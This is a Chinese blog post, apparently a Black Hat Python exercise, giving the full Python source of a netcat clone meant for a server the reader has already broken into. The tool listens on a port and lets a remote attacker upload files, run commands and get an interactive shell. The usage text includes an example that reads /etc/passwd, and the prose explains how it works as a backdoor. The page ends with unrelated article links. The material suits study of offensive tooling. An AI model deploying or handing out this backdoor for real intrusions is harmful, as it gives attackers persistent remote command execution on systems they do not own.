nc即netcat,是网络界的瑞士军刀。当入侵了一个服务器之后,发现nc工具已经被系统管理员移除之后,可以自己制作一个简单的客户端和服务器端来实现①上传文件②执行命令③开启一个新的命令行shell等几个功能。

 __author__ = 'seven'

 import sys

 import socket

 import getopt

 import threading

 import subprocess

 listen = False

 command = False

 upload = False

 execute = ""

 target = ""

 upload_destination = ""

 port = 0

 def usage():

     print "BHP Net Tool"

     print

     print "Usage: netcat.py -t target_host -p port"

     print "-l --listen                - listen on [host]:[port] for incoming connections"

     print "-e --execute=file_to_run   - execute the given file upon receiving a connection"

     print "-c --command               - initialize a command shell"

     print "-u --upload=destination    - upon receiving connection upload a file and write to [destination]"

     print

     print

     print "Examples: "

     print "netcat.py -t 192.168.0.1 -p 5555 -l -c"

     print "netcat.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"

     print "netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""

     print "echo 'ABCDEFGHI' | ./netcat.py -t 192.168.11.12 -p 135"

     sys.exit(0)

 def client_sender(buffer):

     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     try:

         client.connect((target, port))

         if len(buffer):

             client.send(buffer)

         while True:

             recv_len = 1

             response = ""

             while recv_len:

                 data = client.recv(4096)

                 recv_len = len(data)

                 response += data

                 if recv_len < 4096:

                     break

             print response,

             buffer = raw_input("")

             buffer += "\n"

             client.send(buffer)

     except:

         print "[*] Exception! Exiting."

         client.close()

 def server_loop():

     global target

     if not len(target):

         target = "0.0.0.0"

     server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     server.bind((target, port))

     server.listen(5)

     while True:

         client_socket, addr = server.accept()

         client_thread = threading.Thread(target=client_handler, args=(client_socket,))

         client_thread.start()

 def run_command(command):

     command = command.rstrip()

     try:

         output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)

     except:

         output = "Failed to execute command.\r\n"

     return output

 def client_handler(client_socket):

     global upload

     global execute

     global command

     if len(upload_destination):

         file_buffer = ""

         while True:

             data = client_socket.recv(1024)

             if not data:

                 break

             else:

                 file_buffer += data

         try:

             file_descriptor = open(upload_destination, "wb")

             file_descriptor.write(file_buffer)

             file_descriptor.close()

             client_socket.send("Successfully saved file to %s\r\n" % upload_destination)

         except:

             client_socket.send("Failed to save file to %s\r\n" % upload_destination)

     if len(execute):

         output = run_command(execute)

         client_socket.send(output)

     if command:

         while True:

             client_socket.send("<BHP:#> ")

             cmd_buffer = ""

             while "\n" not in cmd_buffer:

                 cmd_buffer += client_socket.recv(1024)

                 response = run_command(cmd_buffer)

                 client_socket.send(response)

 def main():

     global listen

     global port

     global execute

     global command

     global upload_destination

     global target

     if not len(sys.argv[1:]):

         usage()

     # read the commandline options

     try:

         opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",

                                    ["help", "listen", "execute", "target", "port", "command", "upload"])

     except getopt.GetoptError as err:

         print str(err)

         usage()

     for o, a in opts:

         if o in ("-h", "--help"):

             usage()

         elif o in ("-l", "--listen"):

             listen = True

         elif o in ("-e", "--execution"):

             execute = a

         elif o in ("-t", "--target"):

             target = a

         elif o in ("-p", "--port"):

             port = int(a)

         elif o in ("-c", "--command"):

             command = True

         elif o in ("-u", "--upload"):

             upload_destination = a

         else:

             assert False, "Unhandled Option"

     if not listen and len(target) and port > 0:

         buffer = sys.stdin.read()

         client_sender(buffer)

     if listen:

         server_loop()

 main()

在主函数中,通过判断是否含有-l参数来决定是客户端还是服务器端。在实际应用中可以理解为,在目标服务器中作为服务器端以不同功能运行,监听来自攻击者主机的消息,例如以执行命令的功能运行,那么从攻击者主机发来的消息可能是一条命令,而如果以开启新的命令行shell的功能运行的话,那么攻击者主机就可以以命令行交互的方式访问目标服务器;攻击者主机作为客户端与目标服务器启动的程序连接,发送相应数据。

相应的一些例子:

开启两个终端,分别作为服务器端和客户端

服务器端

(图1)

客户端

(图2)

从图1中可以知道,-l参数说明开始监听,-c参数说明开启一个command shell,如果这操作在服务器上执行,那么意味着攻击者可以通过目标服务器的ip地址和9999端口对目标服务器进行访问并且可以以命令行交互的形式。图2就是一个简单的客户端连接,可以看到命令行交互的形式

这里补充一点:由于脚本读取的是标准输入知道接收到EOF(文件末尾)标志,所以看到图2会是这样。在Windows下是ctrl+z,在Linux下是ctrl+d。

Black Hat Python之#1:制作简单的nc工具的更多相关文章

  1. 用Canvas制作简单的画图工具

    今天用Canvas制作了一个画图工具,非常简单,功能也不是很多,主要有背景网格,画线,画圆,画矩形和画圆角矩形,也用到了canvas的一些基本知识,在这里一一列举. 1.线段的绘制: 如何绘制真正的1 ...

  2. 用Python和摄像头制作简单的延时摄影

    “延时摄影(英语:Time-lapse photography)是以一种较低的帧率拍 下图像或者视频,然后用正常或者较快的速率播放画面的摄影技术.在一段延时摄影视频中,物体或者景物缓慢变化的过程被压缩 ...

  3. PYTHON定义函数制作简单登录程序(详细)

    环境:python3.* 结构:   dict_name = {} #定义一个字典,后面用到 def newuser(): #定义注册函数 prompt1='login desired:' while ...

  4. Tkinter制作简单的python编辑器

    想要制作简单的python脚本编辑器,其中文字输入代码部分使用Tkinter中的Text控件即可实现. 但是问题是,如何实现高亮呢?参考python自带的编辑器:python27/vidle文件夹中的 ...

  5. python制作简单excel统计报表3之将mysql数据库中的数据导入excel模板并生成统计图

    python制作简单excel统计报表3之将mysql数据库中的数据导入excel模板并生成统计图 # coding=utf-8 from openpyxl import load_workbook ...

  6. python制作简单excel统计报表2之操作excel的模块openpyxl简单用法

    python制作简单excel统计报表2之操作excel的模块openpyxl简单用法 # coding=utf-8 from openpyxl import Workbook, load_workb ...

  7. 初学Python之爬虫的简单入门

    初学Python之爬虫的简单入门 一.什么是爬虫? 1.简单介绍爬虫   爬虫的全称为网络爬虫,简称爬虫,别名有网络机器人,网络蜘蛛等等. 网络爬虫是一种自动获取网页内容的程序,为搜索引擎提供了重要的 ...

  8. Highcharts使用教程(1):制作简单图表

    今天我们要使用JavaScript图表Highcharts制作简单的柱形图,我们已经安装好Highcharts,让我们开始制作图表吧. 步骤一 在网页中添加一个div.设置id,设置图表长.高.代码如 ...

  9. ZAM 3D 制作简单的3D字幕 流程(二)

    原地址:http://www.cnblogs.com/yk250/p/5663907.html 文中表述仅为本人理解,若有偏差和错误请指正! 接着 ZAM 3D 制作简单的3D字幕 流程(一) .本篇 ...

随机推荐

  1. sequel pro无法连接mysql服务器

    1. 添加用户 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'your_passwd' WITH GRANT OPTION; FLU ...

  2. 吃零食 csust oj 贪心

    吃零食 桌上有n袋零食,不同的零食会有不同的美味程度wi和腐坏程度di,每种零食在一单位时间内美味程度都会下降di,但是不会降到0以下. qwb每一单位时间可以吃掉一袋零食.现在qwb想要在吃完所有零 ...

  3. 数位dp H - F(x) HDU - 4734

    http://acm.hdu.edu.cn/showproblem.php?pid=4734 一般数位dp表示的是数的性质,这个题目也是一样,但是我们求出来的是一个函数的值,怎么把这个值转化成一类数, ...

  4. Oracle创建包

    包: 在公司中,如果业务逻辑比较复杂,需要定义很多过程或者函数.有可能需要定义几十个过程或者函数,这些过程或者函数如果都放到一起,是不是不好管理?我们一般使用包来管理过程或者函数,一个包中可以定义多个 ...

  5. 【Spark】快来学习RDD的创建以及操作方式吧!

    目录 RDD的创建 三种方式 从一个集合中创建 从文件中创建 从其他的RDD转化而来 RDD编程常用API 算子分类 Transformation 概述 帮助文档 常用Transformation表 ...

  6. VA01销售订单批导问题解决

    1业务场景 事务代码:VA01创建销售订单,VA02修改销售订单 可以通过BAPI_SALESORDER_CREATEFROMDAT2批量创建 可以通过BAPI_SALESORDER_CHANGE批量 ...

  7. Linux设备子系统初始化

    本文介绍的内容是基于Linux3.1源码,并参考了很多网上找来的资料 Linux内核的启动的流程如下: start_kernel->rest_init->kernel_init->d ...

  8. Vulnhb 靶场系列:Jarbas1.0

    靶场镜像 官网 信息收集 攻击机kali IP地址 通过nmap 进行主机发现,发现目标机IP地址 nmap -sP 192.168.227.1/24 参数说明: -sP (Ping扫描) 该选项告诉 ...

  9. 这一份MySQL书单,可以帮你搞定90%以上的面试题!

  10. [CodeForces 344D Alternating Current]栈

    题意:两根导线绕在一起,问能不能拉成两条平行线,只能向两端拉不能绕 思路:从左至右,对+-号分别进行配对,遇到连续的两个“+”或连续的两个“-”即可消掉,最后如果全部能消掉则能拉成平行线.拿两根线绕一 ...